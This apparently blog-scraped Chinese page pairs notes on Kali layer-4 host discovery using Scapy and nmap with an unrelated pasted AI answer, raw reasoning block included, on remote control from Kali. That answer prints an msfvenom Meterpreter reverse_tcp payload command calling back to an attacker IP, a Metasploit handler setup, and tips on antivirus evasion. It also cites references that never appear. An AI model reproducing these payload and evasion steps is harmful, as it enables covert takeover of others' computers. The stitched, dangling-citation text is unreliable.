KALI之四层发现

四层发现
可路由且结果可靠
不太可能被防火墙过滤
甚至可以发现所有端口都被过滤的主机
缺点
特别严格的基于状态过滤的防火墙可能过滤扫描
全端口扫描速度慢
TCP
未经请求的ACK-RST
SYN-SYN/ACK、RST
UDP
ICMP端口不可达、一去不复返

Scapy 四层发现

i=IP()
t=TCP()
 r=(i/t)
r[IP].dst="192.168.1.1"
r[TCP].flags="A"
a=sr1(r)
r.display()

我没经过三次握手就发了这个ACK的包如果你给我返回reset了就说明你的主机在线。如果没反应就是不在线

也可以使用一行的方式做上面这些动作,为什么要用一行呢?那是因为为了方便后续做脚本

a=sr1(IP(dst="192.168.1.1")/TCP(dport=80,flags="A"), timeout=1)

上面都是TCP主机的发现

UDP主机发现

如果ip存在,我们将无法收到回应
反而:如果ip不存在,我们就会收到ICMP的不可达信息
所以,要注意使用时最好发送到基本不会使用到的端口

u=UDP()
i=IP()
r=(i/u)
r[IP].dst="192.168.1.1"
u.dport= 33333
a=sr1(r) 

这种方式其实通常无法满足我们的需求;

实际总是运用多种方式,arping,tcp等等结合在一起使用

**nmap 如果觉得scapy很麻烦的话可以用nmap

三四层扫描领域是无敌的状态使用nmap也可以实现通过scapy通过脚本编写的TCP/UDP的这种四层扫描
nmap就不需要编写这么多代码一个参数一个指令就可以完成**

nmap想实现四层主机发现可以使用

nmap IP地址-254 -PU后面跟上端口 -sn

想调用文本里的IP就用

nmap -iL 文本文件 -PA80(这里的PA80可以根据参数依葫芦画瓢) -sn

nmap IP地址 不仅会实现四层发现也会扫描端口
主机发现的参数

-PS 是SYN协议的发现方式
-PY 是SCT协议的发现方式 使用场景少
-PE ICMP的ping包
-PP 时间戳
-PM 请求IP的netmask
-PO IP协议的ping

如果我发flag0 他给我返回ACK、RST那么hping3就会认为这个IP是活着的
发现技术是发现活着的IP是可以通信的IP不是端口
hping在tcp的发现阶段准确性不是那么高

<think>嗯,用户想了解在Kali Linux上实现远程控制电脑的方法或工具。首先,我需要回忆一下KaliLinux常用的远程控制工具,比如SSH、VNC、RDP这些内置的,还有Metasploit这样的渗透测试框架里的模块。用户可能对安全领域比较感兴趣,或者有合法的远程管理需求,但也要注意提醒他们遵守法律法规。 根据用户提供的引用,里面提到了SSH、VNC、RDP,还有使用msfvenom生成payload以及免杀技巧。需要确保回答覆盖这些工具,同时可能还要提到其他工具如Metasploit的Meterpreter。另外,用户可能关心如何配置和使用这些工具,所以分步骤说明会比较清晰。还要注意引用中的内容,比如引用[1]提到多种工具,引用[2]和[4]涉及Metasploit和msfvenom生成木马,引用[3]讨论免杀方法。需要将这些信息整合到回答中,并正确标注引用来源。用户可能需要具体操作步骤,比如如何通过SSH连接,如何设置VNC服务器,或者如何使用Metasploit进行反向连接。同时,安全问题也很重要,比如使用SSH密钥认证,避免使用弱密码,以及法律风险提示。在生成相关问题的时候,应该考虑用户可能进一步询问的方面,比如性能优化、安全加固、故障排除或者法律问题。确保问题覆盖不同层次的需求,从基础配置到高级应用,甚至伦理考量。 最后,检查回答是否符合系统级指令:行内公式正确使用$...$,独立公式用$$...$$,但这里可能用不上数学公式。确保LaTeX语法正确,使用中文回答,生成相关问题,并在引用处添加标识。结构要清晰,分点说明每个工具的方法,步骤详细,同时真实可靠。</think>### Kali Linux远程控制电脑的方法与工具 Kali Linux是专为渗透测试设计的操作系统,内置多种远程控制工具。以下是常用的方法及操作步骤: --- #### 一、基于SSH的远程控制 SSH(Secure Shell)是加密的远程登录协议,适用于命令行控制。 1. **安装SSH服务**: ```bash sudo apt update && sudo apt install openssh-server ``` 2. **启动服务**: ```bash sudo systemctl start ssh ``` 3. **远程连接**(从其他设备): ```bash ssh username@目标IP地址 ``` **注意**:需确保目标设备已开启SSH服务[^1]。 --- #### 二、图形化工具:VNC与RDP 1. **VNC(Virtual Network Computing)**: - **安装TightVNC**: ```bash sudo apt install tightvncserver ``` - **启动VNC服务器**: ```bash vncserver :1 -geometry 1280x800 ``` - **客户端连接**:使用`Remmina`或`RealVNC Viewer`输入目标IP和端口(如`IP:5901`)。 2. **RDP(Remote Desktop Protocol)**: - **安装xrdp**: ```bash sudo apt install xrdp ``` - **连接**:Windows使用`mstsc.exe`,Linux使用`Remmina`,输入目标IP地址。 --- #### 三、渗透测试工具:Metasploit Framework 用于生成反向连接Payload(需合法授权)。 1. **生成Payload**: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=端口 -f exe > payload.exe ``` 此命令生成Windows可执行文件`payload.exe`[^4]。 2. **监听控制端**: ```bash msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 攻击机IP set LPORT 端口 exploit ``` 目标运行`payload.exe`后,攻击机获得Meterpreter会话[^2]。 --- #### 四、安全与法律注意事项 1. **免杀技术**:通过编码、加密或加壳绕过杀毒软件检测(如使用`msfvenom`的`-e`参数编码)[^3]。 2. **合法授权**:未经授权的远程控制可能触犯法律。 3. **防护建议**:目标设备应安装杀毒软件(如360卫士)并定期更新[^3]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值